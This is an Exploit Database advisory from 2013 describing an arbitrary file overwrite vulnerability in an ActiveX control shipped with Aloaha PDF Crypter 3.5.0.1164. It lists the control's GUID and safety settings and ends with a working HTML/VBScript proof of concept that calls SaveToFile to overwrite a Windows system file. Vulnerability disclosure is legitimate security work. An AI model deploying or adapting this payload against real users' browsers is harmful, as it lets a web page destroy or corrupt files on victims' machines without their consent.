Aloaha PDF Crypter (3.5.0.1164) – ActiveX Arbitrary File Overwrite

• Exploit Database
• 21 阅读

• 作者： shinnai
  日期： 2013-01-24
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/24319/

• -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA1
  
  ============================================================================================
   TITLE:
  ============================================================================================
   Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite
  
   url: http://www.aloaha.com/
   download: http://www.aloaha.com/download/aloaha_crypter.zip
   author: shinnai (http://shinnai.altervista.org)
  ============================================================================================
   FILE INFO:
  ============================================================================================
   File: C:\WINDOWS\system32\vbCrypt.dll
   InternalName: ebCrypt
   OriginalFilename: ebCrypt.DLL
   FileVersion: 2.0.0.2087
   FileDescription: ebCrypt Main Module
   Product: ebCrypt
   ProductVersion: 2.0.0.2087
   Language: English (United States)
   MD5 hash: b262cb93c555c3c9604502d071a783ec
  ============================================================================================
   ACTIVEX INFO:
  ============================================================================================
   ProgID: EbCrypt.eb_c_PRNGenerator.1
   GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}
   Description: eb_c_PRNGenerator Class
   Safety report:
   RegKey Safe for Script: False
   RegKey Safe for Init: False
   Implements IObjectSafety: True
   IDisp Safe:Safe for untrusted: caller,data
  ============================================================================================
   BUG:
  ============================================================================================
   This activex contains the "SaveToFile" which could be used to overwite arbitrary files on
   pc users.
  ============================================================================================
   PROOF OF CONCEPT
  ============================================================================================
   <html>
  <object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>
  <script language='vbscript'>
   test.SaveToFile "c:\windows\_system.ini"
  </script>
   </html>
  ============================================================================================
  -----BEGIN PGP SIGNATURE-----
  Version: GnuPG v1.4.13 (MingW32)
  
  iQIcBAEBAgAGBQJQ/6sFAAoJEJlK/ai8vywmSUUQAK38iSzcZ3JsD+Kskt1Zwvhc
  hynADNu17uvlcaUoK7uFc8BwOkRT6XqlmJe6Gab02jPClkmaHRH0Oh8/Zxu8T5Y5
  TsLrw7YgUFQDelS4zL7yxZIKofio3GVS55vo3JL1bJvKrANp99BYcQFX4t5539g9
  l/kYf51QGhWXxEvYFlSpDZ8km8dCElLYTT47oFjXMFSpBHyodrU4MPh4FGLoN1XN
  TLrYDOoTke+RXit/nzNKqbNzXIXmBVTBWfYdPLWwcc07Go4KR3tKGl1ELSCczHeg
  PFWCbcJ18l56809afAviUUvrgb1g9WG9ZY5jMxXP1t5oqeeLJKfKhX0KipVtoBUa
  dZZWJOLp6Mmi8VBzfkTu50jZy1B4EtUSTlmj5A2SKBQRM/0SSqZO1LjwE39fQ9gh
  6avUHhPgV9OLqaWxVbNHy6RYBFYHlo46ytvIhgBDU0VPqwI50yyzrObxbRAhCD19
  GjgSBtZqOJQ9sFwiXS+HHQcCt8ZR6pf09yWmxDr+1L7D4yKvq/Z2TsBuYKMUGazW
  Xni6lxddI7LUN88LXlrV8cCoJ7R2gBe9Tg3nUBIDLpXM4hyeU1DTL0kFNATUk3P5
  7xFde64BvKL2GAzEip8j9PuGhezfflIIhsxPHUEemOvsUctqXEQI8DtC0GkRaT3J
  enDko6b3T5jOt6axrWGb
  =H+Gh
  -----END PGP SIGNATURE-----